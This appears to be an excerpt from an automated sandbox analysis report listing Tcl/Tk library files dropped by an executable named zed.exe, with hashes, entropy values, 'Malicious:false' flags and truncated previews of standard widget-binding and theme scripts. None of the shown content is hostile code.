                                                                                                                                                                                                                                            Preview:# optMenu.tcl --..#..# This file defines the procedure tk_optionMenu, which creates..# an option button and its associated menu...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_optionMenu --..# This procedure creates an option button named $w and an associated..# menu. Together they provide the functionality of Motif option menus:..# they can be used to select one of many values, and the current value..# appears in the global variable varName, as well as in the text of..# the option menubutton. The name of the menu is returned as the..# procedure's result, so that the caller can use it to change configuration..# options on the menu or otherwise manipulate it...#..# Arguments:..# w -...The name to use for the menubutton...# varName -..Global variable to hold the currently
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8418
                                                                                                                                                                                                                                            Entropy (8bit):4.964814946573677
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:HWh/x+hFMyTA/CTzxFoUuliRLDm8pQrQlENPyF3o48M6C:HWL+MyTA/CTzvAiRqyEw3ok
                                                                                                                                                                                                                                            MD5:4CE08A10CD9AE941654B8C679DF669F3
                                                                                                                                                                                                                                            SHA1:F1288BABCA698FD18C3BD221E6AE6C02F2975AAE
                                                                                                                                                                                                                                            SHA-256:849B4C57E4644E51BEAEAEB3AE59B7FF067E582ECD10F1B2CAF6B6E72F11F506
                                                                                                                                                                                                                                            SHA-512:0F37539DA3540E9B1DA7B0377E3BBB359B71DB4271D63BC9501E95931B4E609E8CB91DC2F7B08A6452598D4A0D58C6A2034049A215000EEF0F93A9963D003632
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# palette.tcl --..#..# This file contains procedures that change the color palette used..# by Tk...#..# Copyright (c) 1995-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk_setPalette --..# Changes the default color scheme for a Tk application by setting..# default colors in the option database and by modifying all of the..# color options for existing widgets that have the default value...#..# Arguments:..# The arguments consist of either a single color name, which..# will be used as the new background color (all other colors will..# be computed from this) or an even number of values consisting of..# option names and values. The name for an option is the one used..# for the option database, such as activeForeground, not -activeforeground.....proc ::tk_setPalette {args} {.. if {[winfo depth .] == 1} {...# Just return on monochrome displays, otherwise errors
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5370
                                                                                                                                                                                                                                            Entropy (8bit):4.979530133775421
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:ssAXzkTQ9w5fLQYkJLZkRXKUXfwyZTq2sz8j2Em3YKhrYK:jAXgE0DQpJLGR6UXfpqnzG3m3YKhrYK
                                                                                                                                                                                                                                            MD5:286C01A1B12261BC47F5659FD1627ABD
                                                                                                                                                                                                                                            SHA1:4CA36795CAB6DFE0BBBA30BB88A2AB71A0896642
                                                                                                                                                                                                                                            SHA-256:AA4F87E41AC8297F51150F2A9F787607690D01793456B93F0939C54D394731F9
                                                                                                                                                                                                                                            SHA-512:D54D5A89B7408A9724A1CA1387F6473BDAD33885194B2EC5A524C7853A297FD65CE2A57F571C51DB718F6A00DCE845DE8CF5F51698F926E54ED72CDC81BCFE54
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# panedwindow.tcl --..#..# This file defines the default bindings for Tk panedwindow widgets and..# provides procedures that help in implementing those bindings.....bind Panedwindow <Button-1> { ::tk::panedwindow::MarkSash %W %x %y 1 }..bind Panedwindow <Button-2> { ::tk::panedwindow::MarkSash %W %x %y 0 }....bind Panedwindow <B1-Motion> { ::tk::panedwindow::DragSash %W %x %y 1 }..bind Panedwindow <B2-Motion> { ::tk::panedwindow::DragSash %W %x %y 0 }....bind Panedwindow <ButtonRelease-1> {::tk::panedwindow::ReleaseSash %W 1}..bind Panedwindow <ButtonRelease-2> {::tk::panedwindow::ReleaseSash %W 0}....bind Panedwindow <Motion> { ::tk::panedwindow::Motion %W %x %y }....bind Panedwindow <Leave> { ::tk::panedwindow::Leave %W }....# Initialize namespace..namespace eval ::tk::panedwindow {}....# ::tk::panedwindow::MarkSash --..#..# Handle marking the correct sash for possible dragging..#..# Arguments:..# w..the widget..# x..widget local x coord..# y..widget local y coord..# proxy.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):376
                                                                                                                                                                                                                                            Entropy (8bit):5.040809246948068
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:CsUgabAOgjDnzJNBc6ynID/cL4RpncleXN17MQ9PCSIBIQ08hof7MQ9PCSIBIQei:lGbyntNO6LYZliCNBIUhkCNBIFi
                                                                                                                                                                                                                                            MD5:8A0517A7A4C70111080ED934329E2BC5
                                                                                                                                                                                                                                            SHA1:5B465E0D3500A8F04EE1C705662032F44E2ED0D2
                                                                                                                                                                                                                                            SHA-256:A5D208887A94832328C3A33928A80F3B46AA205C20DB4F050A47D940E94071B4
                                                                                                                                                                                                                                            SHA-512:D9F502A006A5E0514FD61426818AD1F4168E449588F9D383D6B0BF87A18BE82C420863A9A28E1BEB441284A0B1BC2A0B3D3276A0FE3196341AEC15A27920DE5D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:if {![package vsatisfies [package provide Tcl] 8.6.0]} return..if {($::tcl_platform(platform) eq "unix") && ([info exists ::env(DISPLAY)]...|| ([info exists ::argv] && ("-display" in $::argv)))} {.. package ifneeded Tk 8.6.13 [list load [file join $dir .. .. bin libtk8.6.dll]]..} else {.. package ifneeded Tk 8.6.13 [list load [file join $dir .. .. bin tk86t.dll]]..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7632
                                                                                                                                                                                                                                            Entropy (8bit):4.891666209090638
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:Eet0t8bm9Z+Yjo+j/YKOtOUOtk8XKUal320:EetG8biZZs+bIAUoxX0d
                                                                                                                                                                                                                                            MD5:21A3AC11146EC26784C0E729D8D644D0
                                                                                                                                                                                                                                            SHA1:C7E0918E8692C42C1D1DD1BBCBFFF22A85979B69
                                                                                                                                                                                                                                            SHA-256:579701605669AADFFBCDB7E3545C68442495428EE6E93C2D3A3133583BCD3D33
                                                                                                                                                                                                                                            SHA-512:724ED83B989AD9033BEC4211EE50E4C9E85B51054C518CDF7E02D0ED0416F636B9F38C0B0D29F8F4F7F465B77C7D2E01D0918D2C2C3FEC4C7739EA982302FA2E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# safetk.tcl --..#..# Support procs to use Tk in safe interpreters...#..# Copyright (c) 1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# see safetk.n for documentation....#..#..# Note: It is now ok to let untrusted code being executed..# between the creation of the interp and the actual loading..# of Tk in that interp because the C side Tk_Init will..# now look up the parent interp and ask its safe::TkInit..# for the actual parameters to use for it's initialization (if allowed),..# not relying on the child state...#....# We use opt (optional arguments parsing)..package require opt 0.4.1;....namespace eval ::safe {.... # counter for safe toplevels.. variable tkSafeId 0..}....#..# tkInterpInit : prepare the child interpreter for tk loading..# most of the real job is done by loadTk..# returns the child name (tkInterpInit
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8693
                                                                                                                                                                                                                                            Entropy (8bit):4.968450834020619
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:GSusE8YOdpO4aDtao+QYa6t2jooB6ajpaqa5xQGmLGKOC9dLrVx:KsbYQO48t+QYa+NkFjpagGmKKX9dLrVx
                                                                                                                                                                                                                                            MD5:D45202D3D2D052D4C6BFE8D1322AAB39
                                                                                                                                                                                                                                            SHA1:8CDF184AC2E9299B2B2A107A64E9D1803AA298DE
                                                                                                                                                                                                                                            SHA-256:0747A387FDD1B2C7135ECEAE7B392ED52E1D1EBF3FFA90FEBE886DBC0981EB74
                                                                                                                                                                                                                                            SHA-512:27B005F955BAE00D15C4492E7BD3EBDC5EE3BF9C164C418198B4BD185709C8810AA6CF76CBCC07EEB4C1D20F8C76EF8DF8B219563C18B88C94954C910BFF575D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# scale.tcl --..#..# This file defines the default bindings for Tk scale widgets and provides..# procedures that help in implementing the bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1995 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for entries...#-------------------------------------------------------------------------....# Standard Motif bindings:....bind Scale <Enter> {.. if {$tk_strictMotif} {...set tk::Priv(activeBg) [%W cget -activebackground]...%W configure -activebackground [%W cget -background].. }.. tk::ScaleActivate %W %x %y..}..bind Scale <Motion> {.. tk::ScaleActivate %W %x %y..}..bind Scale <Leave> {.. if {$tk_strictMotif} {...%W configure -activebackground
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13188
                                                                                                                                                                                                                                            Entropy (8bit):5.063842571848725
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:Gf7RV8ei32PHKT8H2wwucyRlXn+kl1nBKp4nu5FCyK:2mei3qHKT8WPurnXn+I1nBg4nu5MyK
                                                                                                                                                                                                                                            MD5:5249CD1E97E48E3D6DEC15E70B9D7792
                                                                                                                                                                                                                                            SHA1:612E021BA25B5E512A0DFD48B6E77FC72894A6B9
                                                                                                                                                                                                                                            SHA-256:EEC90404F702D3CFBFAEC0F13BF5ED1EBEB736BEE12D7E69770181A25401C61F
                                                                                                                                                                                                                                            SHA-512:E4E0AB15EB9B3118C30CD2FF8E5AF87C549EAA9B640FFD809A928D96B4ADDEFB9D25EFDD1090FBD0019129CDF355BB2F277BC7194001BA1D2ED4A581110CEAFC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# scrlbar.tcl --..#..# This file defines the default bindings for Tk scrollbar widgets...# It also provides procedures that help in implementing the bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# The code below creates the default class bindings for scrollbars...#-------------------------------------------------------------------------....# Standard Motif bindings:..if {[tk windowingsystem] eq "x11" || [tk windowingsystem] eq "aqua"} {....bind Scrollbar <Enter> {.. if {$tk_strictMotif} {...set tk::Priv(activeBg) [%W cget -activebackground]...%W configure -activebackground [%W cget -background].. }.. %W activate [%W identify %x %y]..}..bind Scrollbar <Motion> {.. %W activate [%
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16543
                                                                                                                                                                                                                                            Entropy (8bit):5.034958189335699
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:IMpfyeKu9TzD0E8+9T1wqBaQKpiqQr7E32fnzXfWJU:IMpfyeKu9Tx8WODTp2zPP
                                                                                                                                                                                                                                            MD5:EAA36F0AA69AE19DDBDD0448FBAD9D4D
                                                                                                                                                                                                                                            SHA1:EB0ADB4F4D937BAC2F17480ADAF6F948262E754D
                                                                                                                                                                                                                                            SHA-256:747889C3086C917A34554A9DC495BC0C08A03FD3A5828353ED2A64B97F376835
                                                                                                                                                                                                                                            SHA-512:C8368F19EC6842ED67073B9FC9C9274107E643324CB23B28C54DF63FB720F63B043281B30DBEA053D08481B0442A87465F715A8AA0711B01CE83FF7B9F8A4F4C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# spinbox.tcl --..#..# This file defines the default bindings for Tk spinbox widgets and provides..# procedures that help in implementing those bindings. The spinbox builds..# off the entry widget, so it can reuse Entry bindings and procedures...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1999-2000 Jeffrey Hobbs..# Copyright (c) 2000 Ajuba Solutions..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button went down (so, for example,..#.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20523
                                                                                                                                                                                                                                            Entropy (8bit):4.786929402401609
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:eeVL0UI9Ms++J7VT/hc+ISyNsATbOan/uW/UFQ1gs1gxtKZufe2SvdJcmq/YbhEB:eeF0UI9Ms++J7VT/hc+ISyCATbOan2W+
                                                                                                                                                                                                                                            MD5:9378397DD3DCA9DFB181F6F512B15631
                                                                                                                                                                                                                                            SHA1:4F95DD6B658B6A912725DC7D6226F8414020D6C7
                                                                                                                                                                                                                                            SHA-256:B04B1A675572E6FCD12C5FE82C4FD0930395548436FF93D848BF340AE202E7E3
                                                                                                                                                                                                                                            SHA-512:D28CC3C8F3D0B1B2371CBD9EE29AC6881BABD8A07C762FF8F3284449998EE44FA44752CC8AB0DE47A3492776CE1D13BC8EA18CFDBDF710639D2D62D02CB917A9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Tcl autoload index file, version 2.0..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(::tk::dialog::error::Return) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::Details) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::SaveToLog) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::Destroy) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::dialog::error::bgerror) [list source [file join $dir bgerror.tcl]]..set auto_index(bgerror) [list source [file join $dir bgerror.tcl]]..set auto_index(::tk::ButtonInvoke) [list source [file join $dir button.tcl]]..set auto_index(::tk::ButtonAutoInvoke) [list sou
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5309
                                                                                                                                                                                                                                            Entropy (8bit):4.74935501162253
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:wfQXIqAv6iEwYtKVlPBnXWASbvMsDjXKpQQkK2tTsSZQ7Fowqm2K5r:wf+IqI6iU43PJYbvMsDjXKpsK2tISyZV
                                                                                                                                                                                                                                            MD5:5F042DE8AD8941C7B9EF6D7BE06C86E4
                                                                                                                                                                                                                                            SHA1:A4DFCEA2ACCAC2E85EAAA186DC765086D1E3AA3C
                                                                                                                                                                                                                                            SHA-256:A4A8568633F827B54326640E6D1C3FDE4978EDC9E9FA1FB1D7B58F189DF1B1DC
                                                                                                                                                                                                                                            SHA-512:E92A00028696A1557666CAB1C25AE6B63F25D75A9811BFAC56DFC069ECC769CC751B71CC81FA85C9CDE8F7FB6D7121EB64B58548CEE8AFE3F6C4A5C243507216
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# tearoff.tcl --..#..# This file contains procedures that implement tear-off menus...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# ::tk::TearoffMenu --..# Given the name of a menu, this procedure creates a torn-off menu..# that is identical to the given menu (including nested submenus)...# The new torn-off menu exists as a toplevel window managed by the..# window manager. The return value is the name of the new menu...# The window is created at the point specified by x and y..#..# Arguments:..# w -...The menu to be torn-off (duplicated)...# x -...x coordinate where window is created..# y -...y coordinate where window is created....proc ::tk::TearOffMenu {w {x 0} {y 0}} {.. # Find a unique name to use for the torn-off menu. Find the first.. # ancestor of w that is a
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):34969
                                                                                                                                                                                                                                            Entropy (8bit):4.95825801435303
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:Rp4LaQDlOrqquMwIMyv4Et8avJLgmTGXs1bYMeNnnZl8n6KRD:RYK8aymTGs1b0xncn6KR
                                                                                                                                                                                                                                            MD5:9CA5094ED6FE46620ABF090BF8E2AE63
                                                                                                                                                                                                                                            SHA1:60DC3C2E3F69CE5B6DB4F2B3A1F3C109D766BC63
                                                                                                                                                                                                                                            SHA-256:AB88556E349F03BACA2D8DC2121071A4F299DB86F484CAB2D9249FF4C7007564
                                                                                                                                                                                                                                            SHA-512:0B0C20A754BE744A7FA214BA06AB0744A9BC466D51F96310D97EA1E61119A8ACFEF24E6DC5C4EBDD2C126BF84ACE74FFE622E9641C87E5A240DD13D1F7B5E6AF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# text.tcl --..#..# This file defines the default bindings for Tk text widgets and provides..# procedures that help in implementing the bindings...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1998 by Scriptics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of ::tk::Priv that are used in this file:..#..# afterId -..If non-null, it means that auto-scanning is underway..#...and it gives the "after" id for the next auto-scan..#...command to be executed...# char -..Character position on the line; kept in order..#...to allow moving up or down past short lines while..#...still remembering the desired position...# mouseMoved -..Non-zero means the mouse has moved a significant..#...amount since the button we
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):24102
                                                                                                                                                                                                                                            Entropy (8bit):5.137459715823081
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:NJyxt+WaB9USY15gSgC3DbTbXLXKr3cIXyDAbK2LMGgtewT+3oFQRyH5bAy59HmD:NJItNe9USZblXysm7GgteoFQRYMESL
                                                                                                                                                                                                                                            MD5:184D05201893B2042D3FA6140FCF277C
                                                                                                                                                                                                                                            SHA1:AAD67797864456749ADF0C4A1C0BE52F563C8FB8
                                                                                                                                                                                                                                            SHA-256:1D5E7518AFC1382E36BF13FC5196C8A7CD93A4E9D24ACF445522564245A489B0
                                                                                                                                                                                                                                            SHA-512:291BDF793CABC5EC27E8265A8A313FE0F4ACAB4DB6CE507A46488A83EEF72CD43CF5815762B22D1C8D64A9EEDEA927E109F937E6573058E5493B1354DD449CB3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# tk.tcl --..#..# Initialization script normally executed in the interpreter for each Tk-based..# application. Arranges class bindings for widgets...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1996 Sun Microsystems, Inc...# Copyright (c) 1998-2000 Ajuba Solutions...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....# Verify that we have Tk binary and script components from the same release..package require -exact Tk 8.6.13.....# Create a ::tk namespace..namespace eval ::tk {.. # Set up the msgcat commands.. namespace eval msgcat {...namespace export mc mcmax.. if {[interp issafe] || [catch {package require msgcat}]} {.. # The msgcat package is not available. Supply our own.. # minimal replacement... proc mc {src args} {.. return [format $src {*}$args].. }.. proc mc
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):39557
                                                                                                                                                                                                                                            Entropy (8bit):5.186073482848965
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:+oj+AqE9cn9tJNgDt0/vsKulXgo65Eh6pQb:+6+Zv/ggEdio65Ehdb
                                                                                                                                                                                                                                            MD5:670837EBC804E7B6E2F65F840BC508D6
                                                                                                                                                                                                                                            SHA1:2DD316487F87DDE5D05F65F564CAE4E1306CE662
                                                                                                                                                                                                                                            SHA-256:3AAA66AE8E74B94481C3F6642634E78BB5D7892771E7C27B54DFA56DED0B2F3C
                                                                                                                                                                                                                                            SHA-512:BB8350ADDF1A25C037DFD60A4AFCBF401CACAD2A370B60BD0BA0981D938C46394BD8D40D1E9A66F4E3C46FCC2A41CF688E78C4F1FE918B45E70D3E92D8B3D116
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# tkfbox.tcl --..#..#.Implements the "TK" standard file selection dialog box. This dialog..#.box is used on the Unix platforms whenever the tk_strictMotif flag is..#.not set...#..#.The "TK" standard file selection dialog box is similar to the file..#.selection dialog box on Win95(TM). The user can navigate the..#.directories by clicking on the folder icons or by selecting the..#."Directory" option menu. The user can select files by clicking on the..#.file icons or by entering a filename in the "Filename:" entry...#..# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval ::tk::dialog {}..namespace eval ::tk::dialog::file {.. namespace import -force ::tk::msgcat::*.. variable showHiddenBtn 0.. variable showHiddenVar 1.... # Create the images if they did not already exist... if {![info exists ::tk::Priv(updirImage)]} {...s
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3713
                                                                                                                                                                                                                                            Entropy (8bit):4.915055696129498
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:InrWdo3L7Fe5qusQGdrMNnQbfIxEOxE0kFgG0FgGouox9FrGVuwg3kNcT+z5UlEr:UWdsOBn/1i+pqxwNjKs
                                                                                                                                                                                                                                            MD5:01F28512E10ACBDDF93AE2BB29E343BC
                                                                                                                                                                                                                                            SHA1:C9CF23D6315218B464061F011E4A9DC8516C8F1F
                                                                                                                                                                                                                                            SHA-256:AE0437FB4E0EBD31322E4EACA626C12ABDE602DA483BB39D0C5EE1BC00AB0AF4
                                                                                                                                                                                                                                            SHA-512:FE3BAE36DDB67F6D7A90B7A91B6EC1A009CF26C0167C46635E5A9CEAEC9083E59DDF74447BF6F60399657EE9604A2314B170F78A921CF948B2985DDF02A89DA6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Ttk widget set: Alternate theme..#....namespace eval ttk::theme::alt {.... variable colors.. array set colors {...-frame .."#d9d9d9"...-window.."#ffffff"...-darker ."#c3c3c3"...-border.."#414141"...-activebg ."#ececec"...-disabledfg."#a3a3a3"...-selectbg."#4a6984"...-selectfg."#ffffff"...-altindicator."#aaaaaa".. }.... ttk::style theme settings alt {.....ttk::style configure "." \... -background .$colors(-frame) \... -foreground .black \... -troughcolor.$colors(-darker) \... -bordercolor.$colors(-border) \... -selectbackground .$colors(-selectbg) \... -selectforeground .$colors(-selectfg) \... -font ..TkDefaultFont \... ;.....ttk::style map "." -background \... [list disabled $colors(-frame) active $colors(-activebg)] ;...ttk::style map "." -foreground [list disabled $colors(-disabledfg)] ;.. ttk::style map "." -embossed [list disabled 1] ;.....ttk::style configure TButton \... -anchor center -width -11 -padding "1 1" \... -reli
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3838
                                                                                                                                                                                                                                            Entropy (8bit):4.940737732832436
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:WdbclJFvlyLi+8OWXgQahpvAdNutdHrFBlCFBK2tdHkFBlhKgY1geAWUWeFVvtdp:C8EQPNeWgFeqdXj
                                                                                                                                                                                                                                            MD5:F07A3A86362E9E253BE91F59714FE134
                                                                                                                                                                                                                                            SHA1:84DE1AB2EAE62E4B114F0E613BD94955AFA9E6C7
                                                                                                                                                                                                                                            SHA-256:E199CC9C429B35A09721D0A22543C3729E2B8462E68DFA158C0CEC9C70A0D79D
                                                                                                                                                                                                                                            SHA-512:324EAF9F857076CA4FECB26D8DF76F8BB1D3F15EAE55D6B6C9689BF1682B306AC7A3592B6A518D23F9FE4DC21EFB6ACF1ECA948F889FA1ADFFA0E12C0BEAB57F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Aqua theme (OSX native look and feel)..#....namespace eval ttk::theme::aqua {.. ttk::style theme settings aqua {.....ttk::style configure . \... -font TkDefaultFont \... -background systemWindowBackgroundColor \... -foreground systemLabelColor \... -selectbackground systemSelectedTextBackgroundColor \... -selectforeground systemSelectedTextColor \... -selectborderwidth 0 \... -insertwidth 1.....ttk::style map . \... -foreground {....disabled systemDisabledControlTextColor....background systemLabelColor} \... -selectbackground {....background systemSelectedTextBackgroundColor....!focus systemSelectedTextBackgroundColor} \... -selectforeground {....background systemSelectedTextColor....!focus systemSelectedTextColor}.....# Button...ttk::style configure TButton -anchor center -width -6 \... -foreground systemControlTextColor...ttk::style map TButton \... -foreground {....pressed white... {alternate !pressed !background} white}...ttk::styl
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3014
                                                                                                                                                                                                                                            Entropy (8bit):4.917794267131833
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:A5N+EqJWR1eTC01cG61ELLgrDgk1JgQ6TQGvhV5giT6TUP+3JWMHTeJ:kN+RQfccG61ooDgQ6dNT6TUP+PHO
                                                                                                                                                                                                                                            MD5:D4BF1AF5DCDD85E3BD11DBF52EB2C146
                                                                                                                                                                                                                                            SHA1:B1691578041319E671D31473A1DD404855D2038B
                                                                                                                                                                                                                                            SHA-256:E38A9D1F437981AA6BF0BDD074D57B769A4140C0F7D9AFF51743FE4ECC6DFDDF
                                                                                                                                                                                                                                            SHA-512:25834B4B231F4FF1A88EEF67E1A102D1D0546EC3B0D46856258A6BE6BBC4B381389C28E2EB60A01FF895DF24D6450CD16CA449C71F82BA53BA438A4867A47DCD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Bindings for Buttons, Checkbuttons, and Radiobuttons...#..# Notes: <Button1-Leave>, <Button1-Enter> only control the "pressed"..# state; widgets remain "active" if the pointer is dragged out...# This doesn't seem to be conventional, but it's a nice way..# to provide extra feedback while the grab is active...# (If the button is released off the widget, the grab deactivates and..# we get a <Leave> event then, which turns off the "active" state)..#..# Normally, <ButtonRelease> and <ButtonN-Enter/Leave> events are..# delivered to the widget which received the initial <Button>..# event. However, Tk [grab]s (#1223103) and menu interactions..# (#1222605) can interfere with this. To guard against spurious..# <Button1-Enter> events, the <Button1-Enter> binding only sets..# the pressed state if the button is currently active...#....namespace eval ttk::button {}....bind TButton <Enter> ..{ %W instate !disabled {%W state active} }..bind TButton <Leave>..{ %W state !active }..bind TButton <s
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
